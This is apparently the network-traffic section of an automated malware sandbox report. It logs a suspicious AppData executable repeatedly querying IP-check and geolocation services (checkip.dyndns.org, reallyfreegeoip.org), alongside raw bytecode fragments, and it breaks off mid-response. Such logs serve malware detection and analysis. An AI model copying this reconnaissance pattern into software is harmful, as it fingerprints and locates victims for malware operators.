                                                                                                          Oct 30, 2024 08:19:41.177154064 CET1236INData Raw: 55 00 00 0a 00 02 7b 2d 00 00 04 02 fe 06 3a 00 00 06 73 63 00 00 0a 6f f5 00 00 0a 00 02 7b 2e 00 00 04 17 6f 4e 00 00 0a 00 02 7b 2e 00 00 04 28 f6 00 00 0a 6f 50 00 00 0a 00 02 7b 2e 00 00 04 28 53 00 00 0a 6f 54 00 00 0a 00 02 7b 2e 00 00 04
                                                                                                          Data Ascii: U{-:sco{.oN{.(oP{.(SoT{. O0sFoG{.so{.rpoH{.sIoJ{.oU{8(oP{8(oT{8 x2sFoG{8s
                                                                                                          Oct 30, 2024 08:19:41.182532072 CET1236INData Raw: 47 00 00 0a 00 02 7b 37 00 00 04 18 18 18 18 73 d2 00 00 0a 6f d3 00 00 0a 00 02 7b 37 00 00 04 72 49 07 00 70 6f 48 00 00 0a 00 02 7b 37 00 00 04 20 bd 00 00 00 1f 58 73 49 00 00 0a 6f 4a 00 00 0a 00 02 7b 37 00 00 04 17 6f 4b 00 00 0a 00 02 7b
                                                                                                          Data Ascii: G{7so{7rIpoH{7 XsIoJ{7oK{7#oL{7oM{/(oP{/ EsFoG{/so{/ropoH{/(-sIoJ{/oK{/oL{/oM


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.2249162132.226.8.169803512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:19:46.457041025 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:19:47.347378969 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:19:47.370827913 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:19:47.654726028 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:19:47.874475002 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:19:49.635246038 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:19:49.910387993 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:19:50.122411013 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:49 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.2249165132.226.8.169803512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:19:51.534768105 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:19:52.456062078 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:52 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.2249167132.226.8.169803512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:19:53.283766031 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:19:54.286794901 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:19:54.502480030 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:54 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.2249169158.101.44.242803512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:19:55.156331062 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:19:55.794917107 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: b2391bd115101780eb30167e84c03f14
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:19:56.011091948 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:55 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: b2391bd115101780eb30167e84c03f14
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.2249171193.122.130.0803512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:19:56.992698908 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:19:57.647878885 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 94d497cde5c38cebfb8bbcf64a0414a6
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:19:57.858486891 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 94d497cde5c38cebfb8bbcf64a0414a6
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.2249173132.226.8.169803512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:19:58.495301962 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:19:59.411719084 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:59 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.2249175132.226.247.73803512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:20:00.248311043 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:20:04.059225082 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:03 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: a07a3f6d5f25edf84fec4c136e474a1a
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.2249177193.122.130.0803512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:20:04.880839109 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.2249178193.122.6.168803512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:20:13.417202950 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:20:14.253120899 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:14 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: e7e1458ba2a47a09baed452a107b3425
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:20:14.462519884 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:20:14 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: e7e1458ba2a47a09baed452a107b3425
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.2249163188.114.96.34433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:19:49 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:19:49 UTC885INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:49 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20812
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IY5JetjhKLFOhD43x7bb0w5hMXuDVpcYrDui3HqS%2FCRN9zWR3ty4j0t96wYZ3KWenLyBqZcU474h%2F9nHrhZ4VAZNj9Gwpl8srjvmfN%2BtGdqikIjQgbzhQoJ0AfY39vd9mizLCTUL"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3a68fdc6c6b-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1057&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2758095&cwnd=234&unsent_bytes=0&cid=ef224848fe82c6f4&ts=267&x=0"
                                                                                                          2024-10-30 07:19:49 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.2249164188.114.96.34433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:19:50 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:19:50 UTC895INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:50 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20813
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPjJS%2F9w1%2BbnDcIRq1NFcC8YFQiNp6ejjYH7sk3G4%2FqvZRJr8QilYU2C8Kb0KaF2%2FmugmBLjUo0FfZ9SXHYTXmt4VrdzwVTKkLRh%2FPIR7UHA%2FYL7kmmn7%2BFXrzbMhAu8Uvq2xZ%2Bg"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da9a3ad78ed2e2a-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1947545&cwnd=234&unsent_bytes=0&cid=8600ba0a29855f84&ts=150&x=0"
                                                                                                          2024-10-30 07:19:50 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.2249166188.114.97.34433512C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:19:53 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:19:53 UTC887INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:19:53 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
